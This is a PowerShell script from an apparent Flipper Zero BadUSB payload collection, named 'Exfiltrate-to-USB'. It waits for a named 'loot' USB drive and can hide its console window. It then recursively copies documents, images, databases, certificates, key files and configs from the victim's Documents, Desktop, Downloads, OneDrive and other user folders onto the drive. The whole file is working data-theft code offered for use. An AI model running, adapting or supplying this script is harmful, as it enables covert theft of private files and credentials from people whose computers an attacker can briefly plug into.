Files
BadUSB-Files-For-FlipperZero/Exfiltrate-to-USB/main.ps1
2023-12-29 23:53:40 +00:00

83 lines
3.0 KiB
PowerShell

[Console]::BackgroundColor = "Black"
[Console]::SetWindowSize(57, 5)
[Console]::Title = "Exfiltration"
Clear-Host
if($driveName.length -lt 1){
$driveName = Read-Host "Enter the name of the USB drive "
}
if($hidden.length -lt 1){
$hidden = Read-Host "Would you like to hide this console window? (Y/N) "
}
$i = 10
While ($true){
cls
Write-Host "Waiting for USB Drive.. ($i)" -ForegroundColor Yellow
$drive = Get-WMIObject Win32_LogicalDisk | ? {$_.VolumeName -eq $driveName} | select DeviceID
sleep 1
if ($drive.length -ne 0){
Write-Host "USB Drive Connected!" -ForegroundColor Green
break
}
$i--
if ($i -eq 0 ){
Write-Host "Timeout! Exiting" -ForegroundColor Red
sleep 1
exit
}
}
[Console]::SetWindowSize(80, 30)
$drive = Get-WMIObject Win32_LogicalDisk | ? {$_.VolumeName -eq $driveName}
$driveletter = $drive.DeviceID
Write-Host "Loot Drive Set To : $driveLetter/" -ForegroundColor Green
$fileExtensions = @("*.log", "*.db", "*.txt", "*.doc", "*.pdf", "*.jpg", "*.jpeg", "*.png", "*.wdoc", "*.xdoc", "*.cer", "*.key", "*.xls", "*.xlsx", "*.cfg", "*.conf", "*.wpd", "*.rft")
$foldersToSearch = @("$env:USERPROFILE\Documents","$env:USERPROFILE\Desktop","$env:USERPROFILE\Downloads","$env:USERPROFILE\OneDrive","$env:USERPROFILE\Pictures","$env:USERPROFILE\Videos")
$destinationPath = "$driveLetter\$env:COMPUTERNAME-Loot"
if (-not (Test-Path -Path $destinationPath)) {
New-Item -ItemType Directory -Path $destinationPath -Force
Write-Host "New Folder Created : $destinationPath" -ForegroundColor Green
}
If ($hidden -eq 'y'){
Write-Host "Hiding the Window.." -ForegroundColor Red
sleep 1
$Async = '[DllImport("user32.dll")] public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);'
$Type = Add-Type -MemberDefinition $Async -name Win32ShowWindowAsync -namespace Win32Functions -PassThru
$hwnd = (Get-Process -PID $pid).MainWindowHandle
if($hwnd -ne [System.IntPtr]::Zero){
$Type::ShowWindowAsync($hwnd, 0)
}
else{
$Host.UI.RawUI.WindowTitle = 'hideme'
$Proc = (Get-Process | Where-Object { $_.MainWindowTitle -eq 'hideme' })
$hwnd = $Proc.MainWindowHandle
$Type::ShowWindowAsync($hwnd, 0)
}
}
foreach ($folder in $foldersToSearch) {
Write-Host "Searching in $folder" -ForegroundColor Yellow
foreach ($extension in $fileExtensions) {
$files = Get-ChildItem -Path $folder -Recurse -Filter $extension -File
foreach ($file in $files) {
$destinationFile = Join-Path -Path $destinationPath -ChildPath $file.Name
Write-Host "Copying $($file.FullName) to $($destinationFile)" -ForegroundColor Gray
Copy-Item -Path $file.FullName -Destination $destinationFile -Force
}
}
}
If ($hidden -eq 'y'){
(New-Object -ComObject Wscript.Shell).Popup("File Exfiltration Complete",5,"Exfiltration",0x0)
}
else{
Write-Host "File Exfiltration Complete" -ForegroundColor Green
}